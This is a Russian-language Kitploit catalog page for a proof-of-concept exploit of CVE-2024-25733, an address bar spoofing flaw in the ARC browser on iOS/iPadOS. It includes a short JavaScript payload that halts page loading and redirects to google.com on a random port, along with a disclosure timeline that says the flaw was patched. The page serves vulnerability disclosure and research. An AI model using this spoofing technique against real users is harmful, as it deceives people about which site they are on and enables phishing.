Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ARC-Browser-Address-Bar-Spoofing-PoC — Эксплойт, подтверждающий концепцию, для CVE-2024-25733, демонстрирующий спуфинг адресной строки в браузере ARC на iOS/iPadOS с использованием манипуляции навигацией на основе JavaScript. | Kitploit
Инструменты/GitHubGitHub/hackintoanetwork/arc-browser-address-bar-spoofing-poc
Безопасность iOSАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийМобильная безопасность
GitHubhackintoanetwork/arc-browser-address-bar-spoofing-poc

ARC-Browser-Address-Bar-Spoofing-PoC

Эксплойт, подтверждающий концепцию, для CVE-2024-25733, демонстрирующий спуфинг адресной строки в браузере ARC на iOS/iPadOS с использованием манипуляции навигацией на основе JavaScript.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
622 лет назадЕщё не проверено
Поделиться

Подделка адресной строки браузера ARC - iOS/iPadOS (CVE-2024-25733)

PoC подделки адресной строки браузера ARC - iOS/iPadOS

Эксплойт PoC (Proof of Concept)

root@kitploit:~
<script>
    function spoof() {
        setTimeout(() => {
            window.stop();
            let randomPort;
            do {
                randomPort = Math.floor(Math.random() * 1000);
            } while (randomPort === 0 || randomPort === 443);
            document.location = "https://google.com:" + randomPort + "/";
        }, 300);
    }
    spoof();
</script>

ДЕМОНСТРАЦИЯ

PoC.mp4

Хронология

  • 2024-01-25 : Уязвимость сообщена компании The Browser Company of New York
  • 2024-01-25 : Признана уязвимостью безопасности
  • 2024-02-13 : Исправлена в последнем релизе
Скачать инструмент